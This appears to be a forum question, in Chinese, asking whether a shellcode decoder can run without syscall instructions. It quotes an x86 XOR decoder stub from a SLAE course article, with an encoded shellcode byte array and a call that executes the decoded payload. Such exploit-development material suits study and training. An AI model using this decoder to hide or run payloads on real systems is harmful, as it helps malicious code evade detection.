如何设计一个没有 syscall/sysenter/int 0x80 的 shellcode 解码器?


我一直在研究 shellcode 解码器,并在网上找到了很多关于它的文章,例如, https://www.rcesecurity.com/2015/01/slae-custom-rbix-shellcode-encoder-decoder/


global _start           

section .text
    jmp get_shellcode

    pop esi         ;pointer to shellcode
    push esi        ;save address of shellcode for later execution
    mov edi,esi    ;copy address of shellcode to edi to work with it

    xor eax,eax    ;clear first XOR-operand register
    xor ebx,ebx    ;clear second XOR-operand register
    xor ecx,ecx    ;clear inner loop-counter
    xor edx,edx    ;clear outer loop-counter

    mov al,[esi]   ;get first byte from the encoded shellcode
    mov bl,[esi+1] ;get second byte from the encoded shellcode
    xor al,bl      ;xor them (result is saved to eax)
    mov [edi],al   ;save (decode) to the same memory location as the encoded shellcode
    inc edi         ;move decoded-pointer 1 byte onward
    inc esi         ;move encoded-pointer 1 byte onward
    inc ecx         ;increment inner loop-counter
    cmp cl,0x3     ;dealing with 4byte-blocks!
    jne loop0          

    inc esi         ;move encoded-pointer 1 byte onward
    xor ecx,ecx    ;clear inner loop-counter
    add dx,0x4     ;move outer loop-counter 4 bytes onward
    cmp dx,len     ;check whether the end of the shellcode is reached
    jne loop0

    call [esp]      ;execute decoded shellcode

    call decoder
    shellcode: db 0x60,0x0a,0x6c,0x34,0xa6,0xcc,0xcd,0x96,0xf9,0xc8,0x3e,0x68,0xf5,0x9f,0x9d,0x37,0xbe,0x5f,0x92,0x5d,0xdd,0x82,0x15,0xe4,0x77,0xc7,0xa1,0xdc,0x8a,0xec,0x84,0xe2,0xe7,0xde,0xb8,0x17,0x44,0x2c,0x1d,0x67,0x36,0x18,0x4f,0xc6,0x27,0x55,0x98,0xa8,0x52,0x87,0x83,0x54,0xa5,0x89,0x09,0x16,0x70,0x33,0xe6,0xb0,0xb1,0xbf,0xd7,0x1a,0x5b,0xdb,0xea,0x59,0xca,0x23,0x93,0xac,0x61,0x0d,0x8d,0xc4,0xbd,0xed,0x14,0xa4,0xaf,0xe0,0x88,0xa7,0x25,0x56,0x63,0x4c,0x2e,0x47,0x5c,0x32,0xbb,0x58,0xc3,0x0b,0xc1,0xff,0xb2,0x22
    len:    equ $-shellcode

让我们暂时忽略实际的解码算法。这个想法是使用 db 关键字将 shellcode 放在内存中。这将在内存中的 .text 部分组装和加载。在运行时,解码器读取此内存并操作字节,然后然后写回内存。然后通过 call [esp] 执行解码后的输出。

如何写回内存的 .text 部分?我们必须调用 mprotect syscall 来启用对 text 部分的写权限或如果 shellcode 在堆栈或 .data 部分等中的执行权限。回到我最初的问题:

是否可以设计一个没有 syscall/sysenter/int 0x80 的 shellcode 解码器?




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